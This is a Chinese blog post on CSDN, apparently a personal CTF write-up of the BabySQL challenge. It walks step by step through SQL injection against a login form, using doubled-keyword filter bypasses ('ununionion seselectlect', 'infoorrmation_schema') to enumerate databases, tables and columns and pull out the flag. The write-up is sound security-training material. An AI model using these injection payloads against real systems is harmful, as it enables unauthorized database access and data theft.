每日一题(第一天)

已于 2022-03-26 16:56:27 修改
阅读量4.3k 收藏
点赞数
文章标签: 安全 wp
于 2022-03-16 16:59:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53965574/article/details/123529276
版权

[极客大挑战 2019]BabySQL

知识点

过滤判断 xxx.com?id=1 访问?id=1and1=1 页面报错 1=1,发现and被过滤,这时候尝试使用双写的方式绕过,如aanndd 1=1,当and被过滤后,aanndd变成了and,所以这时传输数据库的语句是 and 1=1 ,如果当访问 order by 错误信息为”der by”这发现过滤了or,这双写or,后面注入和union注入的一致。

思路

打开发现是一个登录界面,尝试发现注入点,先使用万能密码试试 ’ or 1=1#
在这里插入图片描述
在这里插入图片描述
发现报错,查字段
?username=admin&password=aaa’ order by 1 #
在这里插入图片描述
发现网站过滤了 union select where order or by
往下不怎么会,看了一下师傅们的wp,发现使用双写绕过
进行字段查询,发现到4会报错,那就说明有3个字段
在这里插入图片描述

?username=admin&password=aaa ’ ununionion seselectlect 1,2,3#
注入成功
在这里插入图片描述
?username=admin&password=aaa ’ ununionion seselectlect 1,database(),version() #
然后获取数据库信息
在这里插入图片描述
尝试爆出所有的数据库
?username=admin&password=aaa ’ ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata #
在这里插入图片描述
看到数据库ctf,获取数据库表名

?username=admin&password=aaa ’ ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=“ctf”#
在这里插入图片描述
查看列名
?username=admin&password=aaa ’ ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=“Flag”#
在这里插入图片描述
获取flag
?username=admin&password=aaa ’ ununionion seselectlect 1,2,group_concat(flag) frfromom (ctf.Flag)#
在这里插入图片描述

virus167
关注
每天十道面试题(第一天
12-21
- **继承**:继承允许一个类(子类)继承另一个类(父类)的属性和方法,减少了代码重复,增强了代码的复用性。子类可以扩展或覆盖父类的方法,以满足特定需求。 - **多态**:多态性意味着同一方法可以根据调用它...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1354
整型SQL注入
入门SQL手注教程
Askshhbs的博客
04-22 493
这期教学是给小白学习的,大佬看看就好。 我们先打开靶场:宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 我们先进去发现是一个很简单的页端。 我们先判断是否有注入。 我们先在链接后面添加: and 1=1 来判断是否有注入。 发现返回正常。 我们再在链接末尾输入:and 1=2 这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。 (这里解释一下and 1=1是什么意思 其实很简单就是你问一个服务器1是不是=1
SQL注入时?id=1 and 1=1和?id=1 and 1=2的功能
m0_51756263的博客
07-09 1万+
SQL注入时进行?id=1 and 1=1和?id=1 and 1=2操作的原因
sql注入---入门到进阶
春日野穹
10-24 3万+
目录导航 sql注入的原理 sql注入的条件 sql注入的危害 sql注入的分类、验证及利用方式 sql数值型注入 sql注入的原理: 概述:针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为,其本质就是对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行,sql注入产生的原理有以下几个方面 程序编...
每日一题:机械能专题.doc
08-19
在第一题中,通过比较两次拉动物体的情况,可以得出WF2 = 4WF1 - 2fx,这说明虽然拉力F2是F1的四倍,但由于克服摩擦力所做的功也增加,实际的动能增量并不相同。 2. **机械能守恒**:在第二题中,物块从一定高度...
每日一练】PMP试题七四.pdf
03-09
在这种方法中,第一步是确定并估算每个工作条目的成本(选项C)。这通常包括分析每个任务的资源需求、工时、费率等,以得出精确的单项成本,然后将这些成本加总,形成整体项目的成本预估。 3、预期货币值(EMV)的...
2018高中生物每日一题之快乐暑假第01天从生物圈到细胞含解析新人教版
09-09
这一点体现在题目中的选择题,病毒不能生存的原因是C. 不能自主进行物质和能量交换。 2. 生命系统的结构层次: - 细胞:最基础的生命系统层次,所有生物的生命活动都在细胞层面上展开。 - 组织:由相似功能的细胞...
2018高考数学二轮复习每日一题规范练第一周文
08-05
2. **三角形面积公式**:在第二题中,当a=7时,我们可以通过a、c、sin B来计算三角形面积S_{△ABC} = \frac{1}{2}ac\sin B。 3. **等差数列与等比数列**:题目2涉及了等差数列{a_n}和各项均为正数的等比数列{b_n}。...
sql注入 1-1_基于报错的注入
weixin_44110913的博客
12-01 1568
sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id=1’ 提交 可以看到服务器报错 通过 ’ 1’’ limit0,1 ’ 可以推测出sql语句中提交的参数为:select * from 某数据库 where id =‘id’...
dvwa-sql盲注
01mx的博客
02-05 466
SQL盲注 VS 普通SQL注入: 普通SQL注入: 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 SQL盲注:(不显示错误信息,不能在前端显示) 1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or die语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况 SQL盲注-测试流程 1.
’or 1=1# 初入SQL注入的万能语句
热门推荐
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&am...
SQL注入之重新认识
dfdhxb995397的博客
06-15 182
i春秋作家:anyedt 原文来自:https://bbs.ichunqiu.com/thread-41701-1-1.html 引言 作为长期占据 OWASP Top 10 首位的注入,认识它掌握它是每个渗透测试人员必不可少的一个过程。下面我们一起学习SQL注入,本篇为SQL之重新认识,下一篇为SQL之老生常谈,主要讲解绕过和工具注入的知识。 0×00 SQL注入简介 所谓S...
sql注入,关于id=‘1 and 1=1‘
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
sql where 1=1 0=1 的妙用
爪哇Fighter
05-31 268
where 1=1有什么用?在SQL语言中,写这么一句话就跟没写一样。 select * from table1 where 1=1与select * from table1完全没有区别,甚至还有其他许多写法,1<>2,'a'='a','a'<>'b',其目的就只有一个,where的条件为永真,得到的结果就是未加约束条件的。 在SQL注入时会用到这个,例如sel...
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 633
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
sqlmap基础注入
华丽的贵族
08-23 224
什么是sqlmap SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
最新发布
forvevr的博客
09-25 709
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
SQL每日学习:从基础到进阶
从基本的查询目标和背景,到一般的语法规则,再到编写你的第一个查询,逐步让你熟悉数据检索的过程。同时,还讨论了如何使用WHERE子句过滤数据,ORDER BY子句排序结果,以及GROUP BY和HAVING子句进行分组统计。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值